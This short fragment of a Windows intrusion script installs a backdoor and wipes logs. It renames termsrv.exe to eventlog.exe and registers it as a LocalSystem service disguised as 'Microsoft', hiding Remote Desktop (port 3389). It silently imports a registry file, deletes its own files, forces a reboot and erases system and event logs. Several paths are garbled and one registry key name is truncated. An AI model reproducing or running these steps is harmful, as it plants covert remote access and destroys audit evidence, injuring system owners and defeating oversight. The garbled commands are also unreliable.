74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Deion"="Microsoft"
"DisplayName"="Microsoft"
3389.bat
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
重起
iisreset /reboot /timeout:00
reboot
删除日志
del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dtclog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log
